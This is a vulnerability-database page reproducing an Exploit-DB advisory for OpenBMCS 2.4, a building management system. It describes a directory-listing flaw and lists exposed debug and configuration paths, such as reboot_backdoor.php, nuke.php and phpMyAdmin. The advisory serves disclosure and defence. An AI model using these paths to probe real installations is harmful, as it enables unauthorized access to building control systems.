Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenBMCS 2.4 - Information Disclosure

🗓️ 18 Jan 2022 00:00:00Reported by LiquidWormType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 340 Views

OpenBMCS 2.4 Secrets Disclosure. Directory listing & info disclosure lead to attacker leverage & full BMS acces

Code
# Exploit Title: OpenBMCS 2.4 - Information Disclosure
# Exploit Author: LiquidWorm
# Date: 26/10/2021

OpenBMCS 2.4 Secrets Disclosure


Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: The application allows directory listing and information disclosure of
some sensitive files that can allow an attacker to leverage the disclosed
information and gain full BMS access.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
           Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
           Apache/2.4.41 (Ubuntu)
           Apache/2.4.25 (Debian)
           nginx/1.16.1
           PHP/7.4.3
           PHP/7.0.33-0+deb9u9


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5695
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php


26.10.2021

--


https://192.168.1.222/debug/

Index of /debug

change_password_sqls
clear_all_watches.php
controllerlog/
dash/
dodgy.php
fix_out.php
graphics/
graphics_diag.php
graphics_ip_diag/
jace_info.php
kits/
mysession.php
nuke.php
obix_test.php
print_tree.php
reboot_backdoor.php
rerunSQLUpdates.php
reset_alarm_trigger_times.php
system/
test_chris_obix.php
timestamp.php
tryEmail.php
trysms.php
unit_testing/
userlog/

...
...

/cache/
/classes/
/config/
/controllers/
/core/
/css/
/display/
/fonts/
/images/
/js/
/php/
/plugins/
/sounds/
/temp/
/tools/
/core/assets/
/core/backup/
/core/crontab/
/core/font/
/core/fonts/
/core/license/
/core/load/
/core/logout/
/core/password/
/php/audit/
/php/phpinfo.php
/php/temp/
/php/templates/
/php/test/
/php/weather/
/plugins/alarms/
/tools/phpmyadmin/index.php
/tools/migrate.php

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jan 2022 00:00Current
7.4High risk
Vulners AI Score7.4
openbmcsinformation disclosurevendor open bmcsproduct web pageaffected version 2.4building management & controls systemdirectory listingsensitive filesattacker leveragebms accesslinux ubuntulinux debianapachenginxphpvulnerability discoveredadvisory idadvisory urldebugchange passwordcontroller loggraphicstestinguser logcacheconfigurationcore filesdisplayimagesjavascriptpluginssoundstoolsfontsweatheralarmsphpmyadmin
340